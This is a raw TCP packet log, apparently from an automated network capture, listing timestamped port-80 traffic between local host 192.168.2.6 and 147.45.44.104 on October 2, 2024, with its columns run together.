                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407876968 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407887936 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407890081 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407917976 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408107996 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408117056 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408123016 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408133984 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408144951 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408153057 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408158064 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408189058 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408381939 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408394098 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408406973 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408416033 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408427000 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408430099 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408451080 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408452034 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408461094 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408463955 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408488035 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408499956 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408514977 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408519983 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408526897 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408538103 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408541918 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408561945 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.408961058 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409006119 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409029961 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409041882 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409075022 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409220934 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409229994 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409280062 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409293890 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409306049 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409317017 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409351110 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409377098 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409388065 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409399033 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409414053 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409425020 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409446955 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409570932 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409584999 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409605026 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409631968 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409655094 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409710884 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409723043 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409733057 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409754992 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409816980 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409854889 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409959078 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409970045 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409981012 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.409991980 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410002947 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410003901 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410020113 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410028934 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410034895 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410054922 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410309076 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410348892 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410365105 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410377026 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410410881 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410495996 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410506010 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410516977 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410533905 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410537958 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.410578966 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.495846987 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.495872974 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.495882988 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.495903969 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.495915890 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.495927095 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.495934963 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.495940924 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.495979071 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496009111 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496047974 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496226072 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496241093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496248960 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496254921 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496282101 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496301889 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496373892 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496378899 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496381998 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496393919 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496408939 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496423960 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496448994 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496469975 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496481895 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496494055 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496507883 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496514082 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496537924 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496715069 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496726990 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496737957 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496747971 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496759892 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496767044 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496772051 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496786118 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496794939 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496798038 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496810913 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496824026 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496828079 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.496845961 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497020006 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497040033 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497052908 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497065067 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497076035 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497077942 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497088909 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497097015 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497102022 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497112989 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497117043 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497126102 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497136116 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497148991 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497148991 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497174978 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497200966 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497389078 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497400999 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497411013 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497423887 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497436047 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497436047 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497452974 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497461081 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497464895 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497478962 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497493029 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497495890 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497504950 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497518063 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497518063 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497531891 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497541904 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497570038 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497711897 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497724056 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497735977 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497760057 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497874022 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497888088 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497899055 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497910023 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497926950 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497931004 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497944117 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497956038 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497956991 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497967958 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497977018 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497980118 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497989893 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.497992992 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498007059 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498018026 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498018980 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498030901 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498042107 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498044968 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498054028 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498065948 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498079062 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498080969 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498107910 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498126030 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498449087 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498461008 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498471975 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498483896 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498492002 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498496056 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498511076 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498519897 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498523951 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498552084 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498595953 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498606920 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498617887 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498629093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498639107 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498666048 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498754025 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498764992 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498770952 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498783112 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498794079 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498800993 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498806000 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498817921 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498830080 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498831034 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498842001 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498853922 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498863935 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498878956 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498887062 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498892069 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498903990 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498918056 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498919964 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498927116 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498933077 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498939991 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498939991 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498946905 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498950005 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498950958 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498955965 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498969078 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498970032 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498984098 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.498992920 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.499028921 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.499589920 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.499603033 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.499613047 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.499627113 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.499640942 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.499641895 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.499655008 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.499663115 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.499667883 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.499697924 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.554161072 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.586605072 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.586671114 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.586682081 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.586741924 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.586771011 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.586785078 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.586796045 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.586807966 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.586817980 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.586848974 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.587601900 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.587770939 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.587779999 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.587816000 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.587836981 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.587846041 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.587857008 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.587862968 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.587872982 CEST8049711147.45.44.104192.168.2.6
